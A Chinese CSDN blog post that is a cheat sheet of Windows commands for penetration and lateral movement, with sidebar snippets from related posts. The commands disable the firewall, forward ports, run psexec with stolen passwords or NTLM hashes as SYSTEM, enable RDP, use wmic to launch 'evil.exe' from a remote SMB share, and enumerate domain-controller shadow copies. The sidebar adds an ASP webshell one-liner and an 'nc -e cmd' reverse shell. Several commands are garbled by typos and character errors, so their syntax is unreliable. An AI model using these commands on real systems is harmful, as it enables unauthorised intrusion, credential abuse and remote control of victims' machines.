windows环境渗透中常用系统命令

最新推荐文章于 2024-08-19 14:11:59 发布
最新推荐文章于 2024-08-19 14:11:59 发布
阅读量1k 收藏 2
点赞数
分类专栏: 信息安全 文章标签: windows 渗透 系统命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heilian56/article/details/51498387
版权

禁用windows防火墙
netsh advfirewall set currentprofile state off
netsh adbfirewall set all profiles state off

本机windows端口转发(必须是管理员权限)不需要借助第三方软件进行转发
启用转发
netsh interface port proxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
停止转发
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100

psexec的一些用法

执行远程主机上上的文件或者命令
psexec /acceptula \targetip -u domain\user -p password -c -f \smbip \share\file.exe

#注意,第一次执行psexec一定要带aaceptula参数,否则会弹出一个确认对话框,在命令行下是没办法结束的

利用用户hash来登录远程主机并执行命令
psexec /acceptula \ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\

以system权限来执行远程命令
psexec /accepteula \ip -s md.exe

修改注册表开启windows终端服务
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

wmi命令用法详解

使用用户名密码通过smb来执行远程主机上的命令或者文件
wmic /node: targetiP /user:domain\user /password:password process call create "\ smbiP \share\evil.exe”

卸载软件
wmic product get name /value # 获取软件名称
wmic product where name=11XXX" call uninstall /nointeractive

判定远程登录用户
wmic /node:remotecomputer computersystern get username

实时获取远程主机进程
wmic /node:machinename process list brief /every:1

开启远程rdp
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1’'

列举用户登录时长
wmic netlogin where (name like "%adm%") get numberoflogons

卷影拷贝服务
wmic /node: DC IP /user:"DOI1AIN\user" /password:"P ASS 11 process call create "cmd /c vssadmin list shadows 2 &1 c:\temp\output.txt”


kaitoulee
关注
专栏目录
渗透测试常用系统命令(部分)
weixin_44917470的博客
09-03 715
Windows渗透常用命令 ifconfig /all 获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名 net time /domain 查看域名、时间 net view /domain 查看域内所有共享 net config workstation 查看域名、机器名等 net user 用户名 密码 /add 建立用户 net user 用户名 ...
渗透测试Windows常用系统命令总结
黄乔国PHP
03-02 417
在实际的渗透测试过程,对操作系统的熟练操作及其重要,但是熟练操作的前提就是需要对系统命令进行熟练掌握,Windows系统命令繁多,渗透测试过程也需要用到很多的系统命令,这里对常用系统命令进行总结,可用于渗透测试学习过程的快速查阅.
windows下面常用的***测试命令
weixin_34354173的博客
08-21 340
echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp Md hack 创建hack文件夹 本地nc -vv -p -l 端口服务器nc路径 -e cmd路径 ip 端口 Rd hack 删除hack文件夹 Type d:\wwwroot\hack.asp 查看一句话*...
Kali利用msf渗透Windows电脑(超详细)
最新发布
Galaxy_0的博客
08-19 1141
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
Windows常用内容渗透命令
dengliang7440的博客
03-16 413
假设现在已经拥有一台内网[域]机器,取名X-007. 1-1.内网[域]信息收集 A.本机X-007信息收集. [+]------用户列表[Windows用户列表/邮件用户/...] ---->分析Windows用户列表,不要忽略administrator. ...
渗透基础 – Windows常用命令
Adminxe的博客
05-05 693
0x00 前言 后渗透基础 – Windows常用命令 。如果知道目标存在某文件或者文件夹,又苦于不想一个一个的翻找,那么就试试 find + dir 命令吧。 0x01 全盘搜索命令 dir c:\ d:\ e:\ /s /b | find "简历.pdf" 搜索 C、D、E 盘下的文件名带有 简历.pdf 的文件。 dir 显示目录的文件和子目录列表。 /b 使用空格...
渗透测试基础- - -windows网络安全常用dos命令
weixin_67503304的博客
10-26 4854
本文主要从网络安全的角度讲解了windows的dos命令的基本使用方法。
Windows下内网渗透常用命令总结
Sylon的博客
08-15 2378
域内信息收集常用命令 net group /domain //获得所有域用户组列表 net group zzh /domain //显示域zzh组的成员 net group zzh /del /domain //删除域zzh组 net group zzh andy /del /domain //删除域内zzh 群组的成员 andy net group zzh /add /domai...
metasploit常用渗透命令.zip
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
渗透常用命令
神隐哥的博客
03-02 1568
信息搜集 net view /domain:XXX 查看XXX域的机器列表 net view /domain 查看内网有多少个域 setspn -T jumbolab.com -Q */* 快速寻找内网注册的服务 net user /domain 查看域用户 net group "domain admins" /domain 查看域管 net time /domain 定位域控。也可以通过ipconfig /all。一般DNS就是域控 nltest /domain_trusts 列出域信任关系 c
安全小白必看的Windows渗透基础命令大全
05-07 1560
在这里推荐一下我的同名公众号:程序员启航 Windows发展历史 Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但易用,也慢慢的成为家家户户人们最喜爱的操作系统。 MS-Dos 版本号 发布时间 Windows1.0 1985.11 Windows2.0 1987.12 Windows2.1 1988 Windows3.0 1990.5 ..
渗透测试常用WINDOWS命令
缘木之鱼
07-14 1500
ifconfig /all 获取获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名 net time /domain 查看域名、时间 net view /domain 查看域内所有共享 net view ip 查看对方局域网内开启了哪些共享 net config workstation 查看域名、机器名等 net user 用户名 密码 /add 建立用户 net user guest...
windows渗透常用命令
qq_45780190的博客
12-17 802
net 的常用用法 查看共享连接 net use 增加远程共享 net use host /u:user pass 查看域当前的主机列表 net view /domain 查看当前域的用户 net user /domain 增加一个本地用户 net user user pass /add 将新增的用户加到本地管理员组 net localgroup "Administrators" user /add 查看域的密码策略 net accounts /domain 查看本地组 net loca
Windows、Linux常见的渗透测试命令
weixin_46239998的博客
04-06 1374
渗透测试命令
渗透测试】渗透测试常用的window命令
weixin_43822401的博客
02-02 253
nbtstat -A ip 对方136到139其一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写。netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)psexec.exe \\目标IP -u username -p password -s cmd 在目标机器上执行cmd。wmic /node:"目标IP" /password:"123456" /user:"admin" 连接目标机器。
渗透测试?--常用cmd命令
cgs的博客
01-29 2866
使用ping命令测试网络连接 获取NETBIOS主机名 format: “ping -a IP地址”   for example: “ping -a 172.16.10.20” 使用net命令管理网络环境 net account 该命令用于更新用户的账户数据库,并且为所有账户修改密码和登录需求,如:强制用户在时间到期之后多久必须注销、密码最长/短使用期限、密
windows渗透_汇总常见快捷命令
chenfeng857的博客
09-30 828
解决反弹shell乱码 修复乱码chcp 65001 文件融合 将Trace与beacon融合成为 2.exe,由于破坏了pe结构所以无法执行 copy Trace.exe/b +beacon.exe/a 2.exe 日常运维 任务管理器 taskmgr 查看已打补丁 wmic qfe get Caption,Description,HotFixID,InstalledOn 路由表 route print 查找某个文件的路径 dir /s 1.exe 计算机管理 compmgmt.msc 查看当前是
【3】web安全入门篇-渗透测试常用的命令
热门推荐
weixin_43303273的博客
10-12 2万+
1.linux命令 渗透测试常用的linux命令 上面博客提到的基本都能满足需求 2.cmd命令 常用的cmd命令 cmd命令和linux命令常用的对于web入门的萌新可以看看上面博客,多敲一敲用的时候查就行了 3.powshell Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。 它引入了许多非常有...
Windows内网渗透:远程执行命令技巧
"该文档详细介绍了在Windows内网环境远程执行命令的多种方法,包括计划任务、WMI、WinRM、Smbexec和服务方式,适用于内网渗透测试。文提供了具体的命令行示例,并提到了一些工具和技巧,如wmicmd、wmiexecVBS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kaitoulee

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值